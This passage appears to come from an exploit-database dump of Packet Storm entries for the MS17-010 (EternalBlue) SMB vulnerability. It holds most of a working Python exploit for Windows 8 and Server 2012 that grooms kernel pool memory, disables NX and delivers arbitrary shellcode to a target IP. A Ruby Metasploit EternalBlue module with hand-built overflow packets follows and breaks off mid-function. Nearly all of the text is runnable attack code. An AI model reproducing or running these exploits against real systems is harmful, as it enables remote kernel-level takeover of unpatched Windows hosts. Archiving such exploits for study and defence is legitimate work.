\n# offset 0x110: array of pointer to function \n# offset 0x13c: set to 3 (DWORD) for invoking ptr to function \n# some useful offset \n# offset 0x120: arg1 when invoking ptr to function \n# offset 0x128: arg2 when invoking ptr to function \n# \n# code path to get code exection after this struct is controlled \n# SrvNetWskTransformedReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr \nfake_recv_struct = ('\\x00'*16)*5 \nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself) \nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0) # offset 0x60 \nfake_recv_struct += ('\\x00'*16)*10 \nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x1f0, 0) # offset 0x110: fn_ptr array \nfake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0) # set arg1 to -0x8150 \nfake_recv_struct += pack('<QII', 0, 0, 3) # offset 0x130 \nfake_recv_struct += ('\\x00'*16)*11 \nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x200) # shellcode address \n \n \ndef getNTStatus(self): \nreturn (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass'] \nsetattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus) \n \ndef sendEcho(conn, tid, data): \npkt = smb.NewSMBPacket() \npkt['Tid'] = tid \n \ntransCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO) \ntransCommand['Parameters'] = smb.SMBEcho_Parameters() \ntransCommand['Data'] = smb.SMBEcho_Data() \n \ntransCommand['Parameters']['EchoCount'] = 1 \ntransCommand['Data']['Data'] = data \npkt.addCommand(transCommand) \n \nconn.sendSMB(pkt) \nrecvPkt = conn.recvSMB() \nif recvPkt.getNTStatus() == 0: \nprint('got good ECHO response') \nelse: \nprint('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus())) \n \n \n# do not know why Word Count can be 12 \n# if word count is not 12, setting ByteCount without enough data will be failed \nclass SMBSessionSetupAndXCustom_Parameters(smb.SMBAndXCommand_Parameters): \nstructure = ( 
\n('MaxBuffer','<H'), \n('MaxMpxCount','<H'), \n('VCNumber','<H'), \n('SessionKey','<L'), \n#('AnsiPwdLength','<H'), \n('UnicodePwdLength','<H'), \n('_reserved','<L=0'), \n('Capabilities','<L'), \n) \n \ndef createSessionAllocNonPaged(target, size): \n# The big nonpaged pool allocation is in BlockingSessionSetupAndX() function \n# You can see the allocation logic (even code is not the same) in WinNT4 source code \n# https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/smbadmin.c#L1050 till line 1071 \nconn = smb.SMB(target, target) \n_, flags2 = conn.get_flags() \n# FLAGS2_EXTENDED_SECURITY MUST not be set \nflags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY \n# if not use unicode, buffer size on target machine is doubled because converting ascii to utf16 \nif size >= 0xffff: \nflags2 &= ~smb.SMB.FLAGS2_UNICODE \nreqSize = size // 2 \nelse: \nflags2 |= smb.SMB.FLAGS2_UNICODE \nreqSize = size \nconn.set_flags(flags2=flags2) \n \npkt = smb.NewSMBPacket() \n \nsessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX) \nsessionSetup['Parameters'] = SMBSessionSetupAndXCustom_Parameters() \n \nsessionSetup['Parameters']['MaxBuffer'] = 61440 # can be any value greater than response size \nsessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value \nsessionSetup['Parameters']['VCNumber'] = os.getpid() \nsessionSetup['Parameters']['SessionKey'] = 0 \nsessionSetup['Parameters']['AnsiPwdLength'] = 0 \nsessionSetup['Parameters']['UnicodePwdLength'] = 0 \nsessionSetup['Parameters']['Capabilities'] = 0x80000000 \n \n# set ByteCount here \nsessionSetup['Data'] = pack('<H', size) + '\\x00'*20 \npkt.addCommand(sessionSetup) \n \nconn.sendSMB(pkt) \nrecvPkt = conn.recvSMB() \nif recvPkt.getNTStatus() == 0: \nprint('SMB1 session setup allocate nonpaged pool success') \nelse: \nprint('SMB1 session setup allocate nonpaged pool failed') \nreturn conn \n \n \n# Note: impacket-0.9.15 struct has no ParameterDisplacement \n############# SMB_COM_TRANSACTION2_SECONDARY (0x33) 
\nclass SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters): \nstructure = ( \n('TotalParameterCount','<H=0'), \n('TotalDataCount','<H'), \n('ParameterCount','<H=0'), \n('ParameterOffset','<H=0'), \n('ParameterDisplacement','<H=0'), \n('DataCount','<H'), \n('DataOffset','<H'), \n('DataDisplacement','<H=0'), \n('FID','<H=0'), \n) \n \ndef send_trans2_second(conn, tid, data, displacement): \npkt = smb.NewSMBPacket() \npkt['Tid'] = tid \n \n# assume no params \n \ntransCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY) \ntransCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed() \ntransCommand['Data'] = smb.SMBTransaction2Secondary_Data() \n \ntransCommand['Parameters']['TotalParameterCount'] = 0 \ntransCommand['Parameters']['TotalDataCount'] = len(data) \n \nfixedOffset = 32+3+18 \ntransCommand['Data']['Pad1'] = '' \n \ntransCommand['Parameters']['ParameterCount'] = 0 \ntransCommand['Parameters']['ParameterOffset'] = 0 \n \nif len(data) > 0: \npad2Len = (4 - fixedOffset % 4) % 4 \ntransCommand['Data']['Pad2'] = '\\xFF' * pad2Len \nelse: \ntransCommand['Data']['Pad2'] = '' \npad2Len = 0 \n \ntransCommand['Parameters']['DataCount'] = len(data) \ntransCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len \ntransCommand['Parameters']['DataDisplacement'] = displacement \n \ntransCommand['Data']['Trans_Parameters'] = '' \ntransCommand['Data']['Trans_Data'] = data \npkt.addCommand(transCommand) \n \nconn.sendSMB(pkt) \n \n \ndef send_nt_trans(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True): \npkt = smb.NewSMBPacket() \npkt['Tid'] = tid \n \ncommand = pack('<H', setup) \n \ntransCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT) \ntransCommand['Parameters'] = smb.SMBNTTransaction_Parameters() \ntransCommand['Parameters']['MaxSetupCount'] = 1 \ntransCommand['Parameters']['MaxParameterCount'] = len(param) \ntransCommand['Parameters']['MaxDataCount'] = 0 \ntransCommand['Data'] = 
smb.SMBTransaction2_Data() \n \ntransCommand['Parameters']['Setup'] = command \ntransCommand['Parameters']['TotalParameterCount'] = len(param) \ntransCommand['Parameters']['TotalDataCount'] = len(data) \n \nfixedOffset = 32+3+38 + len(command) \nif len(param) > 0: \npadLen = (4 - fixedOffset % 4 ) % 4 \npadBytes = '\\xFF' * padLen \ntransCommand['Data']['Pad1'] = padBytes \nelse: \ntransCommand['Data']['Pad1'] = '' \npadLen = 0 \n \ntransCommand['Parameters']['ParameterCount'] = len(param) \ntransCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen \n \nif len(data) > 0: \npad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4 \ntransCommand['Data']['Pad2'] = '\\xFF' * pad2Len \nelse: \ntransCommand['Data']['Pad2'] = '' \npad2Len = 0 \n \ntransCommand['Parameters']['DataCount'] = firstDataFragmentSize \ntransCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len \n \ntransCommand['Data']['Trans_Parameters'] = param \ntransCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize] \npkt.addCommand(transCommand) \n \nconn.sendSMB(pkt) \nrecvPkt = conn.recvSMB() # must be success \nif recvPkt.getNTStatus() == 0: \nprint('got good NT Trans response') \nelse: \nprint('got bad NT Trans response: 0x{:x}'.format(recvPkt.getNTStatus())) \nsys.exit(1) \n \ni = firstDataFragmentSize \nwhile i < len(data): \nsendSize = min(4096, len(data) - i) \nif len(data) - i <= 4096: \nif not sendLastChunk: \nbreak \nsend_trans2_second(conn, tid, data[i:i+sendSize], i) \ni += sendSize \n \nif sendLastChunk: \nconn.recvSMB() \nreturn i \n \n \n# connect to target and send a large nbss size with data 0x80 bytes \n# this method is for allocating big nonpaged pool on target \ndef createConnectionWithBigSMBFirst80(target, for_nx=False): \nsk = socket.create_connection((target, 445)) \npkt = '\\x00' + '\\x00' + pack('>H', 0x8100) \n# There is no need to be SMB2 because we want the target free the corrupted buffer. 
\n# Also this is invalid SMB2 message. \n# I believe NSA exploit use SMB2 for hiding alert from IDS \n#pkt += '\\xffSMB' # smb2 \n# it can be anything even it is invalid \npkt += 'BAAD' # can be any \nif for_nx: \n# MUST set no delay because 1 byte MUST be sent immediately \nsk.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) \npkt += '\\x00'*0x7b # another byte will be sent later to disabling NX \nelse: \npkt += '\\x00'*0x7c \nsk.send(pkt) \nreturn sk \n \n \ndef exploit(target, shellcode, numGroomConn): \n# force using smb.SMB for SMB1 \nconn = smb.SMB(target, target) \n \n# can use conn.login() for ntlmv2 \nconn.login_standard('', '') \nserver_os = conn.get_server_os() \nprint('Target OS: '+server_os) \nif not (server_os.startswith(\"Windows 8\") or server_os.startswith(\"Windows Server 2012 \")): \nprint('This exploit does not support this target') \nsys.exit() \n \ntid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$') \n \n# Send special feaList to a target except last fragment with SMB_COM_NT_TRANSACT and SMB_COM_TRANSACTION2_SECONDARY command \nprogress = send_nt_trans(conn, tid, 0, feaList, '\\x00'*30, len(feaList)%4096, False) \n \n# Another NT transaction for disabling NX \nnxconn = smb.SMB(target, target) \nnxconn.login_standard('', '') \nnxtid = nxconn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$') \nnxprogress = send_nt_trans(nxconn, nxtid, 0, feaListNx, '\\x00'*30, len(feaList)%4096, False) \n \n# create some big buffer at server \n# this buffer MUST NOT be big enough for overflown buffer \nallocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x2010) \n \n# groom nonpaged pool \n# when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one \nsrvnetConn = [] \nfor i in range(numGroomConn): \nsk = createConnectionWithBigSMBFirst80(target, for_nx=True) \nsrvnetConn.append(sk) \n \n# create buffer size NTFEA_SIZE at server \n# this buffer will be replaced by overflown buffer 
\nholeConn = createSessionAllocNonPaged(target, NTFEA_SIZE-0x10) \n# disconnect allocConn to free buffer \n# expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer \nallocConn.get_socket().close() \n \n# hope one of srvnetConn is next to holeConn \nfor i in range(5): \nsk = createConnectionWithBigSMBFirst80(target, for_nx=True) \nsrvnetConn.append(sk) \n \n# remove holeConn to create hole for fea buffer \nholeConn.get_socket().close() \n \n# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header \n# first trigger to overwrite srvnet buffer struct for disabling NX \nsend_trans2_second(nxconn, nxtid, feaListNx[nxprogress:], nxprogress) \nrecvPkt = nxconn.recvSMB() \nretStatus = recvPkt.getNTStatus() \nif retStatus == 0xc000000d: \nprint('good response status for nx: INVALID_PARAMETER') \nelse: \nprint('bad response status for nx: 0x{:08x}'.format(retStatus)) \n \n# one of srvnetConn struct header should be modified \n# send '\\x00' to disable nx \nfor sk in srvnetConn: \nsk.send('\\x00') \n \n# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header \n# second trigger to place fake struct and shellcode \nsend_trans2_second(conn, tid, feaList[progress:], progress) \nrecvPkt = conn.recvSMB() \nretStatus = recvPkt.getNTStatus() \nif retStatus == 0xc000000d: \nprint('good response status: INVALID_PARAMETER') \nelse: \nprint('bad response status: 0x{:08x}'.format(retStatus)) \n \n# one of srvnetConn struct header should be modified \n# a corrupted buffer will write recv data in designed memory address \nfor sk in srvnetConn: \nsk.send(fake_recv_struct + shellcode) \n \n# execute shellcode \nfor sk in srvnetConn: \nsk.close() \n \n# nicely close connection (no need for exploit) \nnxconn.disconnect_tree(tid) \nnxconn.logoff() \nnxconn.get_socket().close() \nconn.disconnect_tree(tid) \nconn.logoff() \nconn.get_socket().close() \n \n \nif len(sys.argv) < 3: 
\nprint(\"{} <ip> <shellcode_file> [numGroomConn]\".format(sys.argv[0])) \nsys.exit(1) \n \nTARGET=sys.argv[1] \nnumGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3]) \n \nfp = open(sys.argv[2], 'rb') \nsc = fp.read() \nfp.close() \n \nif len(sc) > 4096: \nprint('Shellcode too long. The place that this exploit put a shellcode is limited to 4096 bytes.') \nsys.exit() \n \n# Now, shellcode is known. create a feaList \nfeaList = createFeaList(len(sc)) \n \nprint('shellcode size: {:d}'.format(len(sc))) \nprint('numGroomConn: {:d}'.format(numGroomConn)) \n \nexploit(TARGET, sc, numGroomConn) \nprint('done') \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142602/mswin82012eb-exec.txt"}, {"lastseen": "2017-05-17T05:27:20", "description": "", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "packetstorm", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-05-17T00:00:00", "id": "PACKETSTORM:142548", "href": "https://packetstormsecurity.com/files/142548/MS17-010-EternalBlue-SMB-Remote-Windows-Kernel-Pool-Corruption.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'ruby_smb' \nrequire 'ruby_smb/smb1/packet' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption', \n'Description' => %q{ \nThis module is a port of the Equation Group ETERNALBLUE exploit, part of \nthe FuzzBunch toolkit released by Shadow Brokers. 
\n \nThere is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size \nis calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a \nDWORD is subtracted into a WORD. The kernel pool is groomed so that overflow \nis well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later \ncompleted in srvnet!SrvNetWskReceiveComplete. \n \nThis exploit, like the original may not trigger 100% of the time, and should be \nrun continuously until triggered. It seems like the pool will get hot streaks \nand need a cool down period before the shells rain in again. \n}, \n \n'Author' => [ \n'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0 \n'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius \n'Equation Group', \n'Shadow Brokers' \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'MSB', 'MS17-010' ], \n[ 'CVE', '2017-0143' ], \n[ 'CVE', '2017-0144' ], \n[ 'CVE', '2017-0145' ], \n[ 'CVE', '2017-0146' ], \n[ 'CVE', '2017-0147' ], \n[ 'CVE', '2017-0148' ], \n[ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 2000, # this can be more, needs to be recalculated \n'EncoderType' => Msf::Encoder::Type::Raw, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 7 and Server 2008 (x64) All Service Packs', \n{ \n'Platform' => 'win', \n'Arch' => [ ARCH_X64 ], \n \n'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset \n'et_alertable' => 0x4c, # ETHREAD.Alertable offset \n'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset \n'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Mar 14 2017' \n)) \n \nregister_options( \n[ \nOpt::RPORT(445), \nOptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]), \nOptInt.new( 'MaxExploitAttempts', [ true, \"The number of times to retry the exploit.\", 3 ] ), \nOptInt.new( 
'GroomAllocations', [ true, \"Initial number of times to groom the kernel pool.\", 12 ] ), \nOptInt.new( 'GroomDelta', [ true, \"The amount to increase the groom count by per try.\", 5 ] ) \n]) \nend \n \ndef check \n# todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010 \nend \n \ndef exploit \nbegin \nfor i in 1..datastore['MaxExploitAttempts'] \n \ngrooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1) \n \nsmb_eternalblue(datastore['ProcessName'], grooms) \n \n# we don't need this sleep, and need to find a way to remove it \n# problem is session_count won't increment until stage is complete :\\ \nsecs = 0 \nwhile !session_created? and secs < 5 \nsecs += 1 \nsleep 1 \nend \n \nif session_created? \nprint_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nbreak \nelse \nprint_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nend \nend \n \nrescue ::RubySMB::Error::UnexpectedStatusCode, \n::Errno::ECONNRESET, \n::Rex::HostUnreachable, \n::Rex::ConnectionTimeout, \n::Rex::ConnectionRefused => e \nprint_bad(\"#{e.class}: #{e.message}\") \nrescue => error \nprint_bad(error.class.to_s) \nprint_bad(error.message) \nprint_bad(error.backtrace.join(\"\\n\")) \nensure \n# pass \nend \nend \n \n# \n# Increase the default delay by five seconds since some kernel-mode \n# payloads may not run immediately. 
\n# \ndef wfs_delay \nsuper + 5 \nend \n \ndef smb_eternalblue(process_name, grooms) \nbegin \n# Step 0: pre-calculate what we can \nshellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0) \npayload_hdr_pkt = make_smb2_payload_headers_packet \npayload_body_pkt = make_smb2_payload_body_packet(shellcode) \n \n# Step 1: Connect to IPC$ share \nprint_status(\"Connecting to target for exploitation.\") \nclient, tree, sock = smb1_anonymous_connect_ipc() \nprint_good(\"Connection established for exploitation.\") \n \nprint_status(\"Trying exploit with #{grooms} Groom Allocations.\") \n \n# Step 2: Create a large SMB1 buffer \nprint_status(\"Sending all but last fragment of exploit packet\") \nsmb1_large_buffer(client, tree, sock) \n \n# Step 3: Groom the pool with payload packets, and open/close SMB1 packets \nprint_status(\"Starting non-paged pool grooming\") \n \n# initialize_groom_threads(ip, port, payload, grooms) \nfhs_sock = smb1_free_hole(true) \n \n@groom_socks = [] \n \nprint_good(\"Sending SMBv2 buffers\") \nsmb2_grooms(grooms, payload_hdr_pkt) \n \nfhf_sock = smb1_free_hole(false) \n \nprint_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\") \nfhs_sock.shutdown() \n \nprint_status(\"Sending final SMBv2 buffers.\") # 6x \nsmb2_grooms(6, payload_hdr_pkt) # todo: magic # \n \nfhf_sock.shutdown() \n \nprint_status(\"Sending last fragment of exploit packet!\") \nfinal_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15) \nsock.put(final_exploit_pkt) \n \nprint_status(\"Receiving response from exploit packet\") \ncode, raw = smb1_get_response(sock) \n \nif code == 0xc000000d #STATUS_INVALID_PARAMETER (0xC000000D) \nprint_good(\"ETERNALBLUE overwrite completed successfully (0xC000000D)!\") \nend \n \n# Step 4: Send the payload \nprint_status(\"Sending egg to corrupted connection.\") \n \n@groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) } \n@groom_socks.each{ |gsock| 
gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) } \n \nprint_status(\"Triggering free of corrupted buffer.\") \n# tree disconnect \n# logoff and x \n# note: these aren't necessary, just close the sockets \n \nensure \nabort_sockets \nend \nend \n \ndef smb2_grooms(grooms, payload_hdr_pkt) \ngrooms.times do |groom_id| \ngsock = connect(false) \n@groom_socks << gsock \ngsock.put(payload_hdr_pkt) \nend \nend \n \ndef smb1_anonymous_connect_ipc() \nsock = connect(false) \ndispatcher = RubySMB::Dispatcher::Socket.new(sock) \nclient = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '') \nclient.negotiate \n \npkt = make_smb1_anonymous_login_packet \nsock.put(pkt) \n \ncode, raw, response = smb1_get_response(sock) \n \nunless code == 0 # WindowsError::NTStatus::STATUS_SUCCESS \nraise RubySMB::Error::UnexpectedStatusCode, \"Error with anonymous login\" \nend \n \nclient.user_id = response.uid \n \ntree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\") \n \nreturn client, tree, sock \nend \n \ndef smb1_large_buffer(client, tree, sock) \nnt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id) \n \n# send NT Trans \nvprint_status(\"Sending NT Trans Request packet\") \nsock.put(nt_trans_pkt) \n \nvprint_status(\"Receiving NT Trans packet\") \nraw = sock.get_once \n \n# Initial Trans2 request \ntrans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0) \n \n# send all but last packet \nfor i in 1..14 \ntrans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i) \nend \n \ntrans2_pkt_nulled << make_smb1_echo_packet(tree.id, client.user_id) \n \nvprint_status(\"Sending malformed Trans2 packets\") \nsock.put(trans2_pkt_nulled) \n \nsock.get_once \nend \n \ndef smb1_free_hole(start) \nsock = connect(false) \ndispatcher = RubySMB::Dispatcher::Socket.new(sock) \nclient = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', 
password: '') \nclient.negotiate \n \npkt = \"\" \n \nif start \nvprint_status(\"Sending start free hole packet.\") \npkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\") \nelse \nvprint_status(\"Sending end free hole packet.\") \npkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\") \nend \n \n#dump_packet(pkt) \nsock.put(pkt) \n \nvprint_status(\"Receiving free hole response.\") \nsock.get_once \n \nreturn sock \nend \n \ndef smb1_get_response(sock) \nraw = sock.get_once \nresponse = RubySMB::SMB1::SMBHeader.read(raw[4..-1]) \ncode = response.nt_status \nreturn code, raw, response \nend \n \ndef make_smb2_payload_headers_packet \n# don't need a library here, the packet is essentially nonsensical \npkt = \"\" \npkt << \"\\x00\" # session message \npkt << \"\\x00\\xff\\xf7\" # size \npkt << \"\\xfeSMB\" # SMB2 \npkt << \"\\x00\" * 124 \n \npkt \nend \n \ndef make_smb2_payload_body_packet(kernel_user_payload) \n# precalculated lengths \npkt_max_len = 4204 \npkt_setup_len = 497 \npkt_max_payload = pkt_max_len - pkt_setup_len # 3575 \n \n# this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode \npkt = \"\" \n \n# padding \npkt << \"\\x00\" * 0x8 \npkt << \"\\x03\\x00\\x00\\x00\" \npkt << \"\\x00\" * 0x1c \npkt << \"\\x03\\x00\\x00\\x00\" \npkt << \"\\x00\" * 0x74 \n \n# KI_USER_SHARED_DATA addresses \npkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address \npkt << \"\\x00\" * 0x10 \npkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address \npkt << \"\\x00\" * 0xc4 \n \n# payload addreses \npkt << \"\\x90\\xf1\\xdf\\xff\" \npkt << \"\\x00\" * 0x4 \npkt << \"\\xf0\\xf1\\xdf\\xff\" \npkt << \"\\x00\" * 0x40 \n \npkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" * 0x8 \npkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" \n \npkt << kernel_user_payload \n \n# fill out the rest, this can be randomly generated 
\npkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length) \n \npkt \nend \n \ndef make_smb1_echo_packet(tree_id, user_id) \npkt = \"\" \npkt << \"\\x00\" # type \npkt << \"\\x00\\x00\\x31\" # len = 49 \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x2b\" # Echo \npkt << \"\\x00\\x00\\x00\\x00\" # Success \npkt << \"\\x18\" # flags \npkt << \"\\x07\\xc0\" # flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << [tree_id].pack(\"S>\") # Tree ID \npkt << \"\\xff\\xfe\" # PID \npkt << [user_id].pack(\"S>\") # UserID \npkt << \"\\x40\\x00\" # MultiplexIDs \n \npkt << \"\\x01\" # Word count \npkt << \"\\x01\\x00\" # Echo count \npkt << \"\\x0c\\x00\" # Byte count \n \n# echo data \n# this is an existing IDS signature, and can be nulled out \n#pkt << \"\\x4a\\x6c\\x4a\\x6d\\x49\\x68\\x43\\x6c\\x42\\x73\\x72\\x00\" \npkt << \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\" \n \npkt \nend \n \n# Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit \ndef make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout) \ntimeout = (timeout * 0x10) + 3 \n \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x10\\x35\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x33\" # Trans2 request \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << \"\\x07\\xc0\" # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << [tree_id].pack(\"S>\") # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << [user_id].pack(\"S>\") # UserID \npkt << \"\\x40\\x00\" # MultiplexIDs \n \npkt << \"\\x09\" # Word Count \npkt << \"\\x00\\x00\" # Total Param Count \npkt << \"\\x00\\x10\" # Total Data Count \npkt << \"\\x00\\x00\" # Max Param Count \npkt << \"\\x00\\x00\" # Max Data 
Count \npkt << \"\\x00\" # Max Setup Count \npkt << \"\\x00\" # Reserved \npkt << \"\\x00\\x10\" # Flags \npkt << \"\\x35\\x00\\xd0\" # Timeouts \npkt << timeout.chr \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x00\\x10\" # Parameter Count \n \n#pkt << \"\\x74\\x70\" # Parameter Offset \n#pkt << \"\\x47\\x46\" # Data Count \n#pkt << \"\\x45\\x6f\" # Data Offset \n#pkt << \"\\x4c\" # Setup Count \n#pkt << \"\\x4f\" # Reserved \n \nif type == :eb_trans2_exploit \nvprint_status(\"Making :eb_trans2_exploit packet\") \n \npkt << \"\\x41\" * 2957 \n \npkt << \"\\x80\\x00\\xa8\\x00\" # overflow \n \npkt << \"\\x00\" * 0x10 \npkt << \"\\xff\\xff\" \npkt << \"\\x00\" * 0x6 \npkt << \"\\xff\\xff\" \npkt << \"\\x00\" * 0x16 \n \npkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses \npkt << \"\\x00\" * 0x8 \npkt << \"\\x20\\xf0\\xdf\\xff\" \n \npkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64 \n \npkt << \"\\x60\\x00\\x04\\x10\" \npkt << \"\\x00\" * 4 \n \npkt << \"\\x80\\xef\\xdf\\xff\" \n \npkt << \"\\x00\" * 4 \npkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" * 0x10 \n \npkt << \"\\x60\\x00\\x04\\x10\" \npkt << \"\\x00\" * 0xc \npkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" * 0x8 \npkt << \"\\x80\\x10\" \npkt << \"\\x00\" * 0xe \npkt << \"\\x39\" \npkt << \"\\xbb\" \n \npkt << \"\\x41\" * 965 \n \nreturn pkt \nend \n \nif type == :eb_trans2_zero \nvprint_status(\"Making :eb_trans2_zero packet\") \npkt << \"\\x00\" * 2055 \npkt << \"\\x83\\xf3\" \npkt << \"\\x41\" * 2039 \n#pkt << \"\\x00\" * 4096 \nelse \nvprint_status(\"Making :eb_trans2_buffer packet\") \npkt << \"\\x41\" * 4096 \nend \n \npkt \n \nend \n \ndef make_smb1_nt_trans_packet(tree_id, user_id) \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x04\\x38\" # length 